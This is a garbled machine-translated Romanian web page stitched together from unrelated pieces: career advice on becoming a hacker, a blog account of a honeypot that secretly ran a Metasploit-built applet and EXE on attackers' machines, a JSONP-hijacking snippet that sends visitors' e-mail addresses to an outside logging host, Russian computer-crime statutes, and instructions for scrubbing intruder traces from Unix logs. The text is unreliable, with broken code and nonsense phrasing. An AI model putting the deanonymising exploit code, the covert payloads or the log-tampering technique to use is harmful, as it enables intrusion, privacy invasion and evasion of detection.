Acasă / Internet / Ce înseamnă să prinzi un hacker în flagrant? Ce greșeli ale unui hacker ajută să-l prindă sau cum să nu se ardă? Cine pirata hackerii

Ce înseamnă să prinzi un hacker în flagrant? Ce greșeli ale unui hacker ajută să-l prindă sau cum să nu se ardă? Cine pirata hackerii

De unde ar trebui să începi dacă vrei să înveți cum să controlezi codurile de program și capcanele criptografice? Cum devii hacker? La urma urmei, pot pătrunde cu ușurință în computerul altcuiva, spargând mai multe parole pe parcurs. Nu este nimic ciudat în dorința de a deveni hacker, pentru că toată lumea a vrut măcar o dată să se uite la e-mailul sau contul altcuiva.

Cine sunt hackerii?

Deci, cum devii hacker? În primul rând, trebuie să înțelegeți ce se înțelege prin acest termen. Trebuie remarcat faptul că hackerii nu au nimic în comun cu diferite tipuri de atacatori care fac comerț cu furtul de bani de la conturi bancareși să atace o varietate de resurse pentru a bloca accesul utilizatorilor la acestea. Desigur, experții moderni în calculatoare și-au pierdut statutul de specialiști IT cu înaltă calificare. În legătură cu evenimentele recente, au început să se bucure de o reputație proastă în rândul oamenilor obișnuiți.


Dar înainte de acest termen s-au ascuns adevărații genii ai computerelor care au fost capabili să corecteze codurile din programe pe baza propriilor algoritmi non-standard. Prin urmare, după ce a pus întrebarea cum devine cineva hacker, ar trebui să realizeze obiectivele care vor trebui atinse prin stăpânirea acestei profesii nu în totalitate simplă și rară. Trebuie avut în vedere faptul că în stadiul actual există diferite tipuri de restricții în legi. Și nu le puteți ignora, deoarece aceasta va implica responsabilitate. În plus, fraudă în domeniu software este deja cauza unui număr mare de povești scandaloase. Iar personajele principale din ele sunt tocmai hackerii, care, totuși, nu pot decât să pretindă laurii hoților de bani și secrete ale altora.

Este necesară învățarea limbajelor de programare

Mai vrei să răspunzi la întrebarea cum devine cineva hacker? Atunci ar trebui să înțelegeți că fără o pregătire adecvată nu se va realiza nimic. O carieră ca expert respectat în domeniu tehnologie informatică iar programele ar trebui să înceapă cu procesul de învățare a limbajelor de programare. În stadiul actual sunt destul de multe. Trebuie înțeles că există limbi care vă permit să comunicați direct cu calculatoare personale. Cu ajutorul lor, puteți găsi soluții la diferite tipuri de probleme. Pentru a crea programe de sine stătătoare, se folosesc instrumente moderne. În același timp, programarea în rețea este o ramură separată a codurilor de program cu comenzi care vă vor permite să structurați documentația. Cu ajutorul lor, puteți administra și o mare varietate de procese pe Internet.


Încercând să ne dăm seama cine este un hacker, trebuie remarcat că există o altă categorie de limbi. Vorbim despre mecanisme de proiectare diverse diferite programe platforme în dispozitive compacte ( telefoane mobile). În acest sens, atunci când se face o alegere în favoarea unui anumit domeniu de activitate, este necesar să se selecteze limbajul de programare corespunzător. Aici trebuie să concentrați cea mai mare atenție.

Chiar instructiuni simple necesită cunoștințe

Desigur, pentru a pirata e-mail, în stadiul actual puteți utiliza instrucțiuni pas cu pas. Cu toate acestea, nu vă vor permite să înțelegeți cine este hackerul. Și principiile de funcționare a diferitelor programe, precum și complexitățile transferului de date pe Internet, vor trebui încă studiate. În acest sens, ar trebui să încercați mai întâi să studiați terminologia caracteristică mediului hackerilor și programatorilor. Prin termeni specifici poți comunica cu specialiștii în computer fără teama de amatori care nu au cunoștințe suficiente pentru a înțelege un „limbaj” special.

Trebuie studiat sisteme de operare

Cum să devii hacker? Lecțiile prin care poți studia acest domeniu de activitate vor necesita mult timp, efort și dorință. Ce altceva este nevoie în afară de învățarea terminologiei și a limbajului de programare? Ar trebui să înveți să citești sistemele de operare. Unix/Linux este considerată o familie de hackeri. Suficient caracteristică importantă Unix-urile sunt open source. Puteți citi cum a fost scris sistemul de operare. Există posibilitatea de a-l studia amănunțit. De asemenea, puteți încerca să schimbați ceva. În plus, Unix/Linux este orientat spre Internet.

Necesită cunoștințe de internet și scripting

Pentru a deveni un hacker, trebuie să înțelegeți cum să utilizați World Wide Web. De asemenea, ar trebui să înțelegeți principiile scrierii HTML. Web-ul este o excepție serioasă, o jucărie grozavă pentru hackeri. După cum au spus politicienii, internetul are puterea de a schimba lumea. Și numai din acest motiv este necesar să înveți cum să lucrezi cu el.

Dacă nu ai învățat încă un limbaj de programare, scrierea în HTML te va ajuta să dobândești câteva abilități utile. Acestea vor fi utile atunci când stăpânești codurile de program și principiile de scriere a acestora. În acest sens, trebuie să înveți cum să faci cel puțin pagini de pornire. Ar trebui să încercați și XHTML. Este mai frumos proiectat în comparație cu HTML clasic.

Din punct de vedere tehnic, World Wide Web este un complex de rețele de calculatoare. Cu toate acestea, în stadiul actual, este un mediu de comunicare destul de important, care poate fi folosit pentru a îndeplini o varietate de sarcini. Trebuie înțeles că hackerii ruși trebuie să cunoască limba engleză. Acest lucru se datorează cantității mari de informații care sunt disponibile numai în această limbă.

Nu ar trebui să existe monotonie

A fi specialist în domeniul calculatoarelor, al programelor și al World Wide Web este o mare plăcere. Cu toate acestea, acest lucru va necesita un efort maxim. Prin urmare, motivația este necesară. Pentru a fi hacker, trebuie să te bucuri de procesul de rezolvare a problemelor în timp ce îți perfecționezi abilitățile și îți antrenezi inteligența. Specialiștii de acest nivel nu se plictisesc niciodată să studieze o mulțime de limbi și programe pentru o lungă perioadă de timp și minuțios, iar munca nu li se pare monotonă. Ei fac ce le place.

Cum să devii hacker? Un set de programe (sisteme de operare, limbaje de programare, sursă deschisă etc.), cunoașterea limbii engleze, dorința de a înțelege ceva nou - toate acestea vă vor ajuta să vă atingeți obiectivele. Dar ce altceva ar trebui să-ți amintești?

  • Nu trebuie să uităm că pentru a deveni unul dintre cei mai buni din afacerea ta, trebuie doar să rezolvi cele mai dificile probleme. Nu trebuie să ai prea multă stima de sine. Trebuie doar să-ți stabilești obiective și să te dezvolți zi de zi. Dacă ceva nu a fost clar astăzi, atunci mâine ar trebui să încercați să înțelegeți problema complexă. Dacă nu a fost învățată o nouă abilitate, atunci cel mai probabil ziua a fost irosită. Nu ar trebui să-ți faci nicio favoare.

  • Nu toate specialisti in calculatoare sunt la fel. Sunt cei care sunt interesați doar să facă profit. Sunt cei care se străduiesc pentru cunoaștere și informare, uneori încălcând legea. Dar toți hackerii celebri au scopuri diferite. Acesta este ceea ce le permite să atingă înălțimi semnificative în profesia lor.
  • Ca începător, nu ar trebui să încercați să piratați mari corporații sau agenții guvernamentale. Trebuie înțeles că persoanele care sunt responsabile de securitatea acestor sisteme, cel mai probabil, își înțeleg mult mai bine afacerea. Trebuie remarcat faptul că astfel de specialiști nu vor răspunde prompt chiar și atunci când este detectată o intruziune. Mai întâi vor aștepta până când hackerul atacă serios. Cu alte cuvinte, un novice se poate simți în siguranță după un hack continuând să investigheze sistemele, de exemplu, pentru vulnerabilități. Și în acest moment, specialiștii îi atrag în mod activ într-o capcană.
  • Este necesar să se îmbunătățească constant prin studierea literaturii de specialitate.
  • Concluzie

    Pe baza tuturor celor de mai sus, putem trage o concluzie. Trebuie să studiem în mod constant o varietate de discipline, limbi, literatura și Internetul. Nu sunt atât de mulți hackeri. Prin urmare, pentru a deveni unul dintre ei, trebuie să te pregătești inițial pentru minuțios și muncă îndelungatăîn primul rând asupra ta. Și totuși, dacă încă din copilărie nu ți-a plăcut să rezolvi probleme logice, atunci ar trebui să încerci să-ți găsești o altă activitate care să nu necesite brainstorming, perseverență maximă și răbdare serioasă.

    Cum să devii un hacker de la zero

    Munca unui hacker profesionist este foarte interesantă. Hackuri de site-uri web, furt informatii importante, furt de bani, pătrundere, dezvăluire de secrete. Posibilitățile unui adevărat hacker sunt nesfârșite. Cât despre numele lui, acesta este ascuns cu grijă.

    Tinerii sunt atrași de activitățile active de furt de informații și de piratare a site-urilor web. Dar nu țin cont de faptul că pentru astfel de acțiuni de multe ori trebuie să răspundă în fața legii.

    Munca nu implică întotdeauna activități ilegale, iar acesta este un fapt. Daca vrei sa lucrezi in domeniul informatic, marile companii vor apela la serviciile tale. Și nu este surprinzător, deoarece hackerul este un specialist IT de primă clasă.


    După cum arată practica, corporațiile și băncile mari doresc un hacker profesionist în personalul lor. Organizațiile protejează informațiile importante folosind tehnologia computerizată, iar un specialist este capabil să detecteze lacunele de securitate și să prevină furtul de date.

    Doar auto-dezvoltarea te va ajuta să-ți găsești o profesie. Îți voi împărtăși câteva sfaturi și, cu ajutorul lor, te vei apropia de visul tău și, poate, te vei realiza.

    Plan de acțiune pas cu pas
  • Abilități de bază. În primul rând, familiarizați-vă cu Internetul, aflați semnificația diferitelor rubrici, învățați o mulțime de concepte de bază și înțelegeți interacțiunea browserelor cu serverele.
  • Limbaje de programare. Acordați o atenție deosebită învățării limbajelor de programare. Cu ajutorul tutorialelor care abundă pe Internet, învață cum să scrii programe simple. Cu puțin efort, vei stăpâni abilitățile de programare, iar pe viitor vei avea ocazia să le îmbunătățești.
  • Dacă visezi să lucrezi ca hacker, acordă o atenție deosebită învățării limbajului de marcare hipertext numit HTML.
  • engleză. Nu te poți descurca fără să cunoști engleza. Acest limbaj este folosit de toate serviciile mondiale. Prin urmare, deținerea acestuia este o necesitate.
  • Cele patru puncte subliniate vă vor ajuta să stăpâniți abilitățile de bază. După ce ați finalizat sarcina, începeți să studiați problemele profesionale și complexitățile hackingului. Din fericire, internetul este plin de informații legate de subiectul de astăzi.

    • Apreciază-ți timpul și colegii. Asigurați-vă că vă împărtășiți realizările cu „frații de arme”.
    • Respectați codul. Hackerii au propriul lor cod, care interzice să dai sau să ia în schimb. Dacă ați reușit să piratați programul altcuiva, informați proprietarul, astfel încât să poată lucra la protejarea creației sale.
    • Eliminați gândurile stereotipe. Un hacker nu ar trebui să gândească în stereotipuri. El trebuie să aibă capacitatea de a găsi rapid și întotdeauna răspunsuri.
    • Cere un sfat. Dacă ceva nu este clar, nu ezitați să cereți sfaturi pe un forum tematic. Dacă ați rezolvat singur problema, împărtășiți algoritmul de soluție cu colegii dvs. Ei vor face același lucru în viitor.
    • Fii cu ochii pe tehnologie. Un computer este un organism viu și un prieten apropiat al unui specialist IT. Prin urmare, echipamentele informatice, sistemele staționare, laptopurile sau netbook-urile au nevoie de îngrijire.

    Atinge-ți obiectivul rapid dacă echipa ta de aliați este completată cu perseverență și timp liber. În fiecare zi va trebui să înveți informații noi, care vor aduce experiență.

    Sfaturi video


    DESPRE jocuri pe calculator E mai bine să uiți. Petreceți-vă timpul liber dobândind cunoștințe care vă vor fi utile în viitor. Asigurați-vă că citiți Codul Penal pentru a evita o situație neplăcută.

    Cum să devii un hacker de unde să începi

    Continuând tema articolului de astăzi, vom lua în considerare principalele etape ale antrenamentului pentru a afla în detaliu de unde să începem să devii hacker.

    În filme de lung metraj, hackerii pirata sistemele de plată, site-urile web guvernamentale, organizațiile mari și unitățile industriale. Scopul principal al hacking-ului este informațiile importante sau banii. În realitate, totul nu este atât de simplu.

    Un hacker este un programator obișnuit care este capabil să spargă codul software. Cu toate acestea, el are alte obiective. El nu caută să obțină date importante și să le vândă pe bani mari pe piața neagră. În timpul hackingului, un specialist se familiarizează cu principiul de funcționare al unui anumit program, studiază codul pentru a găsi găuri și creează un program analog sau similar.


    Mulți oameni consideră hackerii ca fiind criminali care hack și distrug, așa că există „specialiști” care nu sunt hackeri, dar încearcă să ducă un stil de viață similar. Chiar și un începător poate dăuna unui site web sau computer dacă folosește un script rău intenționat care se deghizează în program și este plasat pe site-uri web.

    În viața reală, întâlnirea cu un adevărat profesionist în acest domeniu este problematică. Un hacker experimentat nu vă va spune niciodată ce face. Lucrează singur pentru că știe că o astfel de activitate este pedepsită.

  • Fii răbdător. Realizați că stăpânirea abilităților va dura ani.
  • Acordați o atenție deosebită studiului matematicii aplicate. Crede-mă, fără cunoștințe matematice nu vei putea deveni hacker.
  • Asigurați-vă că cumpărați cărți dedicate funcționării programelor, platformelor software și sistemelor de securitate.
  • Învață să scrii cod și să creezi sisteme criptate fără ajutor extern. Lucrul fără aceste abilități este imposibil.
  • Citiți reviste tematice, vizitați site-uri web și forumuri dedicate activităților de hacking. Sursele de informare vor ajuta la auto-dezvoltare.
  • Tine un jurnal. Înregistrați statisticile succeselor și realizărilor. În timp, vei observa că abilitățile tale au devenit mai avansate.
  • Fiți pregătiți pentru faptul că studiul acasă va fi lung și va necesita efort maxim. Acesta este singurul mod de a cuceri vârfurile și de a rupe stereotipurile. Amintiți-vă, trebuie să acționați în conformitate cu legea.

    Video

    Sper că povestea vă va ajuta, iar dumneavoastră, după ce v-ați familiarizat cu materialul, veți obține rapid succesul.

    Nu uitați că crearea sau modificarea programelor care duc la copierea ilegală, blocarea sau distrugerea unor informații importante este o infracțiune pedepsită. Pentru astfel de fapte pot fi condamnați la închisoare pe 3 ani și amendați cu o sumă corectă.

    De multe ori m-am confruntat cu întrebări din partea utilizatorilor despre dacă este posibil să identific cumva hackerul care a spart acest site sau acela. Întrebarea este destul de interesantă și este imposibil să dai un răspuns clar la ea. Desigur, totul depinde de calificările celui care efectuează atacul și de prudența sa. Dar, după cum sa dovedit în practică, mulți hackeri fac greșeli destul de stupide și își dezvăluie anonimatul. Să vedem cum.

    În primul rând... de ce am nevoie de asta? Nu sunt un „tip cu trei litere”, ci un inginer modest, nu am încă niciun plan să cuprind lumea și nu sunt implicat în alte lucruri fără scrupule, așa că de ce nu mi-a plăcut anonimatul? Răspunsul este simplu - anonimi, hackeri, script kiddies... Acești tipi încearcă mereu să spargă ceva, să fure, să-și strice sau să-și conducă situația de urgență. Chestia asta, dacă te gândești bine, nu este atât de rău (este mai bine decât să te răsfeți cu drogurile pe alee), dar din moment ce băieților le place să se joace, hai să ne jucăm cu ei.

    Anonimatul lor nu este un lucru sacru, așa că puteți lupta cu el 8) Dar, ca rezultat general, toate acestea funcționează cu orice utilizator de internet, doar am depus eforturi exclusiv împotriva atacatorilor, a celor care încearcă să obțină acces neautorizat și să încalce articolul 272 din Codul penal al Federației Ruse. În plus, experiența mea va fi o ilustrare interesantă a subiectului „contraatacurilor” asupra atacatorilor înșiși în modul automat fără intervenție umană. Rezultatul unui contraatac este dezvăluirea de informații despre atacator, ceea ce, vedeți, este un lucru bun, nu un lucru rău...

    Butoiul de miere

    Pentru a nu deteriora anonimatul cetățenilor nevinovați și pentru a contraataca doar „răucătorii”, trebuie să vă asigurați că utilizatorul în cauză este un hacker. Pentru a face acest lucru, este suficient să existe un sistem de analiză a comportamentului vizitatorilor cu un mecanism de detectare a acțiunilor de „atacare”. Pe scurt, tot ce trebuie să faci este să faci un vas de miere. Pentru a face acest lucru, nu trebuie să instalați honeyd etc. De exemplu, pentru cazul general cu o resursă WEB, este suficient să plasați un pseudo-script de lucru pe serverul de producție, care se va pretinde a fi util și funcțional, dar în realitate va detecta încercările de pătrundere și, în cazul unui Atacul „de succes”, va pretinde că hack-ul a fost un succes. După aceea, efectuați un contraatac asupra utilizatorului respectiv.

    Un exemplu bun, să creăm un script admin.php sau /admin/, nu contează, orice atacator care se respectă va găsi acest URI în câteva secunde, aceasta este o mișcare evidentă. Dacă doriți să creșteți atenția elementelor nedorite la capcană, puteți plasa un link cu pagina de start(se spune că administratorul este aici), pentru că sarcina principală este ca tipul rău să înceapă să atace mai întâi honeypot, și nu să caute în scripturi normale.

    În scriptul pseudo-admin, evident, ei cer un login și o parolă. În continuare, este o chestiune de fantezie, puteți aștepta ca atacatorul să forțeze parola sau să emuleze o vulnerabilitate a clasei SQL Injection, iar apoi orice parolă a clasei va face bine. ‘ sau 1=1/*, care va oferi acces la „panoul de administrare”. În același timp, putem colecta statistici - cum a fost piratat panoul de administrare, prin selecție sau prin SQLi. Ei bine, este de la sine înțeles - oricine intră în „panoul de administrare” este un tip „rău”, iar dezvăluirea anonimatului său nu îmi provoacă probleme morale.

    De fapt, în 2011, am postat un astfel de script pe site-ul meu și am început să aștept... Nu am așteptat mult, din moment ce site-ul era dedicat subiectului securității informațiilor, numărul persoanelor care doreau să-l pirateze a depășit toate imaginaţie.

    Lovi-mă în frunte

    Evident, în cel mai general caz, tot ce avem despre un vizitator al site-ului web (și atacator, în cazul nostru particular) este doar o adresă IP, User-Agent etc. După cum am spus, nu suntem CIA/FSB/MOSSAD... nu avem sau PRISM, și înțelegem că o adresă IP (având în vedere diferitele servere Proxy și TOR de acolo) este de fapt NIMIC. Cu asta ne ocupăm în cele mai multe cazuri, dar dacă jucăm un moment psihologic subtil (în special în ceea ce privește copiii cu scenarii), se dovedește că acești tipi nu se așteaptă la un truc! Cu alte cuvinte, în corpul „panoului de administrare” puteți face orice - închideți un pachet de stricăciuni, de exemplu, și loviți oamenii neglijenți cu exploit. Dar am jucat mai „plat”, am lansat Applet-ul Java. De exemplu, ați fost autentificat... iată panoul nostru GUI în Java.

    Un element de inginerie socială - un atacator, într-un acces de bucurie de la un atac SQLi de succes, poate lansa prostesc un applet. Și... am fost surprins, dar au fost destui (desigur, mai târziu, în timp, procentul de penetrare a scăzut, deoarece informațiile despre configurație s-au răspândit rapid într-un cerc restrâns de specialiști;). De fapt, appletul a zvâcnit prost Fișierul EXE de pe server și l-am lansat.

    Fișierul EXE a colectat date NON-PERSONALE (da, da, respect Legea Federală a Datelor cu Caracter Personal...), doar următoarele informații: IP local, traseu din rețea, numele mașinii, autentificarea utilizatorului. Acest lucru nu este mult, dar în cele mai multe cazuri este suficient să ocoliți TOR/Proxy/VPN și chiar să aflați numele atacatorului! În plus, desigur, ar fi posibil să colectați BSSID-ul punctelor de acces din jur, de exemplu, și să faceți fotografii de la camera web a laptopului, să analizați fișierele de configurare din șurub etc., etc. Pe scurt, ideea este că, instalând un „agent de contrainformații” pe computerul atacatorului, am ocolit multe obstacole, iar TOR și Proxy nu mai sunt în afaceri. Un contraatac evident.

    Notă: agentul meu nu a avut acces la distanță, deși din punct de vedere tehnic ar putea fi codificat, nu am vrut să fac backdoor și să răspândesc malware. Acest agent nu a fost rău intenționat, deoarece a colectat informații pur tehnice despre computerul atacatorului și mediul său de rețea. Apropo, toate datele au fost transmise printr-un canal DNS invers, care a îmbunătățit „atingerea” cu succes a datelor - http://www.xakep.ru/post/55661/.

    1) Ministerul Apărării al Federației Ruse

    Unul dintre primii care a încercat să folosească un atac de tip SQLi au fost băieții de la IP-ul EXTERN al Ministerului Apărării Federația Rusă. Din fericire pentru mine, fie nu s-au îndrăgostit de applet, fie au avut Linux (din moment ce a trebuit să adaug funcționalitate multiplatformă). Știu că sunt băieți buni acolo și, desigur, nu și-au dorit nimic rău! Dar sper că în timpul „operațiunilor de informații” adevărate folosesc cel puțin servere proxy chinezești 😉

    2) Companie de antivirus

    Această lansare a fost făcută cu mașină virtuală companie de antivirus. Serverul DNS și tracert au ars biroul 8) Este de remarcat că băieții nu au adăugat agentul pe lista de malware! Apreciat. Vă mulțumesc băieți!

    3) O grămadă de băieți

    Doar o grămadă de tipi diferiți, unii știau despre funcție și doar s-au jucat, alții nu (http://habrahabr.ru/post/122107/#comment_4003842)

    4) Și cel mai interesant lucru este Gazda deținută de INTELLIGENCE a uneia dintre țările CSI. Cu penetrare „inversă”.

    La început am decis că asta este, războiul cibernetic a început! În urma unui contraatac, agentul nostru a ajuns să alerge pe o gazdă aparținând serviciului de informații al altui stat. Doar contul părea a fi un cont de serviciu, ceea ce sugera că gazda a fost compromisă și a fost folosită ca intermediar. Puțin mai târziu în aceeași zi, am primit instalarea unui al doilea „agent” din aceeași țară, doar că de data aceasta nu de la o rețea de agenție guvernamentală, ci de la un computer de acasă. Numele de utilizator pentru computer s-a dovedit a fi ușor pentru Google și identificarea persoanei a ieșit fără probleme. În același timp, ținând cont de aceste „coincidențe”, putem spune că fie lucrează pentru acest serviciu de informații, fie cumva a obținut acces la o gazdă guvernamentală.

    Rănire prin ricoșeu

    Bine, înțelegem că cel mai simplu mod de a dezvălui anonimatul este să contraataci prin pachete de exploatare sau cu elemente SI, dar acest lucru este gros și evident. Dar a existat o altă idee - servicii de la terți, cum ar fi webmail sau, de exemplu, social media. Puteți face atacul mai invizibil... ceea ce am făcut 8)

    Da, pe lângă applet, în cazul unui atac cu succes asupra mea, am aflat e-mailul atacatorului pentru a ști exact „cine este de vină” (ei bine, ce să fac este deja clar..). Și din nou, anonimatul nu este un lanț TOR/VPN/Proxy. Acest lucru nu este suficient! Și deci esența este simplă, dacă un cetățean folosește servicii precum VKontakte, yandex, google, linkedin, twitter, facebook etc... și în același timp este autentificat în mod constant pe ele, atunci dacă există vulnerabilități () pe aceste servicii, anonimatul DVS. va fi dezvăluit. S-a întâmplat că s-au găsit vulnerabilități în serviciile mail.ru și yandex.ru (le-am raportat cu mult timp în urmă și au fost patch-uri de mult timp, totuși, am reușit să le testez de dragul meu „științific”. ” experiment privind capturarea practică a băieților răi...). Cea mai comună vulnerabilitate (pe ambele servicii): JSONP Hijacking. Esența este simplă, există un anumit serviciu:

    mail-service.com/ajax?callback=func

    În consecință, pentru a exploata acest decalaj și a dezvălui anonimatul, folosim codul:

    funcția func(obj) ( var url="http://loger.com/log.php?value="+obj["e-mail"]; $.get(url); } !}

    funcția func(obj)

    var url = "http://loger.com/log.php?value=" + obj ["e-mail" ] ; !}

    $. obține(url);

    < script src = "http://mail-service.com/ajax?callback=func" / >

    Așa că nu uitați: puteți uita de TOR/VPN dacă sunteți mereu pe rețelele sociale. rețelele nici măcar nu trebuie să aibă CSRF/XSS „prost” pentru a urmări cine ești și de unde ești.

    Atacator tipic:

    Si inca ceva...

    Apropo, ca un alt exemplu al acestei abordări, rețeaua linkedin nici măcar nu are nevoie de o vulnerabilitate, este o caracteristică reală - un jurnal al celor care v-au vizualizat profilul. Adică, dacă pun prost o redirecționare către un profil linkedin special înregistrat pe panoul meu de administrare:

    Drept urmare, putem afla mai multe informații despre atacatori direct pe Linkedin:

    Apropo, este posibil să observați că SAMEORIGIN nu ajută, deoarece cerere GET trece înainte ca browserul să verifice politica de ORIGINĂ, verificarea are loc ATUNCI 😉

    Statistici

    În sfârșit, câteva statistici. Experimentul a durat din T2 2011 până în Q3 2012.

    Total atacuri UNIQUE SQLi - 484 (timp de ~1,2 ani)

    Dintre acestea, contraatacuri de succes (Applet Java) - 52 (în ~1,2 ani)

    Dintre acestea, au existat 16 contraatacuri de succes pe mail.ru/yandex.ru (peste 6 luni)

    ~17% rata de succes cu contraatacuri.

    Graficul dependenței:

    După cum puteți vedea, la început a existat un applet și am adăugat „săpunul” mult mai târziu. Vârfurile de prezență sunt asociate cu anunțurile privind întâlnirile de grup ZeroNights și Defcon. Breaking through mail este de fapt liniară, în timp ce în cazul applet-urilor, dependența a fost liniară doar la începutul experimentului. Acest lucru se datorează actualizărilor Java, apoi au adăugat applet-ul la baza de date de malware (ceea ce nu este surprinzător, deoarece a fost compilat dintr-o sarcină utilă metasploit)

    P.S. Apropo, dacă cu yandex.ru există un loc pentru a raporta erorile pe care le-am găsit, atunci în cazul mail.ru nu am găsit contacte până nu l-am întâlnit pe specialistul local în securitate și i-am scurs bug-ul personal...

    Concluzii

    Deși această postare pe blog este mai mult despre cum i-am prins pe băieții „răi”, deși, de fapt, acest lucru poate fi extrapolat la problemele de anonimat pe Internet - dacă specialiștii IT/IS și hackerii sunt în flăcări, atunci cum rămâne cu oamenii normali? Este destul de evident că TOR/Proxy și VPN nu ajută în această problemă. O autentificare pe o rețea de socializare, neatenția și multe altele sunt suficiente pentru a potrivi fără ambiguitate un vizitator la o resursă web cu o persoană reală. Fii atent și JFYI: Cum funcționează hack-urile reale

    Bună Nadezhda! Te-ai dezabonat pe blogul meu spunând că ai toate datele despre un criminal cibernetic, dar nu știi cum să le folosești pentru a pedepsi atacatorul. De asemenea, m-a interesat această întrebare, așa că împărtășesc informațiile pe care am reușit să „pescuiesc” în această chestiune din vastitatea internetului actual, profanat de mulți oameni răi sub formă de hackeri și escroci:

    — Reclamați furnizorul hackerului care efectuează un atac asupra site-ului dvs. După ce au colectat anterior toate dovezile disponibile (capturi de ecran, jurnale, date, corespondență etc.). Se pare că decizia furnizorului de a bloca internetul pentru un atacator este luată în instanță. Nu stiu exact.

    — Contactați agențiile de aplicare a legii, în special FSB. Codul Penal al Federației Ruse conține următoarele articole:

    Codul penal al Federației Ruse Capitolul 28: Crimă în domeniul informațiilor informatice
    Articolul 272. Accesul ilegal la informații informatice
    1. Accesul ilegal la informații informatice protejate de lege, adică informații de pe medii informatice, într-un computer electronic (calculator), sistem informatic sau rețeaua acestora, dacă acest act a presupus distrugerea, blocarea, modificarea sau copierea informațiilor, perturbarea funcţionarea calculatorului, a sistemului Calculatoare sau a reţelelor acestora - se pedepseşte cu amendă în mărime de două sute la cinci sute de ori salariul minim lunar, sau în cuantumul salariului sau al altor venituri ale persoanei condamnate pe o perioadă de două până la cinci luni, sau prin muncă corecțională pe o perioadă de la șase luni până la un an, sau cu închisoare de până la doi ani.

    2. Aceeași faptă, săvârșită de un grup de persoane prin conspirație anterioară sau de un grup organizat ori de către o persoană care își folosește funcția oficială, precum și accesul la un computer, un sistem informatic sau la rețeaua acestora, se pedepsește cu amendă. în cuantum de cinci sute până la opt sute de ori salariul minim sau în cuantumul salariului sau al altor venituri ale persoanei condamnate pe o perioadă de cinci până la opt luni, sau muncă corecțională pe un termen de la unu la doi ani, sau arestare pt. un termen de la trei până la șase luni sau închisoare de până la cinci ani.

    Articolul 273. Crearea, utilizarea și distribuirea de programe informatice rău intenționate
    1. Crearea de programe de calculator sau efectuarea de modificări la programele existente, conducând cu bună știință la distrugerea, blocarea, modificarea sau copierea neautorizată a informațiilor, întreruperea funcționării unui computer, a unui sistem informatic sau a rețelei acestora, precum și la utilizarea sau distribuirea unor astfel de programe sau medii informatice cu astfel de programe - se pedepsește cu închisoare de până la trei ani cu amendă în mărime de două sute până la cinci sute de ori salariul minim lunar, sau în cuantumul salariului sau al altor venituri ale persoană condamnată pe o perioadă de la două până la cinci luni.
    2. Aceleași fapte, care au avut consecințe grave prin neglijență, -
    se pedepseşte cu închisoare de la trei la şapte ani.

    Articolul 274. Încălcarea regulilor de operare a calculatoarelor, sistemelor informatice sau a rețelelor acestora
    1. Încălcarea regulilor de exploatare a unui calculator, a unui sistem informatic sau a rețelei acestora de către o persoană care are acces la un computer, un sistem informatic sau la rețeaua acestora, având ca rezultat distrugerea, blocarea sau modificarea informațiilor informatice protejate de lege, dacă acest act a cauzat un prejudiciu semnificativ, -
    se pedepsește cu privarea de dreptul de a ocupa anumite funcții sau de a exercita anumite activități pe un termen de până la cinci ani sau cu muncă obligatorie pe un termen de la o sută optzeci până la două sute patruzeci de ore sau cu restrângerea libertății pentru un termen de până la doi ani.
    2. Aceeași faptă, care a cauzat consecințe grave din cauza neglijenței, -
    se pedepseşte cu închisoare de până la patru ani.

    Ambele metode de „răzbunare” implică birocrație incredibilă, instanțe etc.

    Un tânăr hacker, care avea un număr mare de mașini sparte în contul său, a încercat fără succes să acceseze serverul unei bănci internaționale. În cele din urmă, a spart acest sistem, petrecând câteva nopți nedormite pe el. „Ei chiar l-au detectat, am curățat buștenii și am fost extrem de atent”, se gândi el. Dintr-o dată gândurile i-au fost întrerupte de scârțâitul subțire al UPS-ului, ceea ce a însemnat o întrerupere a curentului. Apoi s-a auzit o bătaie puternică în uşă, în spatele căreia stăteau angajaţi federali înarmaţi. Această poveste s-ar fi încheiat cu tristețe dacă nefericitul hacker nu s-ar fi... trezit din scârțâitul ceasului cu alarmă.

    De fapt, puțini hackeri ar pirata sisteme bancare fără a cunoaște elementele de bază ale propriei siguranțe. Administratorii din sistemele importante din punct de vedere strategic nu sunt oameni proști și primesc bani buni pentru munca lor, așa că este foarte periculos să concurezi cu ei în cunoștințele de tehnologie informatică.

    Dar ei o sparg! Se sparg și rămân neobservate pe servere luni, sau chiar ani. Și totul datorită camuflajului de bază. Se realizează, de regulă, prin respectarea mai multor legi nescrise pe care le cunoaște orice hacker care se respectă. Încălcând una dintre aceste reguli, poți deveni vulnerabil în fața administratorilor, care vor detecta și neutraliza prompt intrusul găsit. În acest caz, consecințele pentru contravenient pot fi foarte grave.

    Vă întrebați despre ce fel de încălcări vorbim? În acest articol, voi sublinia pe scurt zece greșeli ale hackerilor care, în opinia mea, sunt cele mai populare. Erorile sunt relevante în principal pentru sisteme asemănătoare Unix, așa că le rog pe fanii Windows să nu își creadă speranțe.

    1. Bușteni de curățare

    Destul de ciudat, puțini oameni le place să curețe jurnalele într-un sistem piratat. Dar prin intermediul jurnalelor administratorul detectează intruziunea. Să ne uităm la mecanismul de creare a jurnalelor într-un sistem de operare asemănător Unix.

    De regulă, informațiile de serviciu sunt descărcate într-un fișier folosind funcția syslog(). Această funcție funcționează direct cu demonul syslogd sau alternativa acestuia (syslog-ng, de exemplu). Acest demon are propriul său fișier de configurare (/etc/syslog.conf în mod implicit), care detaliază locația fișierelor jurnal și criteriile pentru un anumit jurnal pentru a separa corect muștele de cotlet. Un hacker uită adesea că administratorul poate schimba numele jurnalelor implicite redirecționând /var/log/secure către, de exemplu, /usr/admin/secure. În plus, jurnalele pot fi scrise pe consola unui anumit utilizator, ceea ce complică foarte mult situația unui hacker.

    Curățarea unor astfel de fișiere trebuie făcută cu precauție extremă: cu ștergătoare de lemn de încredere sau manual (ideal). Am întâlnit personal astfel de ștergere, după ce am folosit înregistrarea datelor. Cred că un administrator respectabil în această situație va observa rapid probleme în sistem.

    Destul de ciudat, este foarte ușor să ștergi manual jurnalele de text. În primul rând, trebuie să aflați dacă există date în jurnalele care ar trebui eliminate (de exemplu, ip-ul hackerului sau autentificarea în sistem). Aceste informații sunt apoi șterse cu atenție dintr-un jurnal separat și apoi redirecționate către un fișier temporar. Și numai după aceea fișierul temporar este redenumit în cel real. Aceste operațiuni sunt efectuate folosind comenzile standard grep și mv. Acestea pot fi realizate și folosind editori externi (vi, ee, mc).
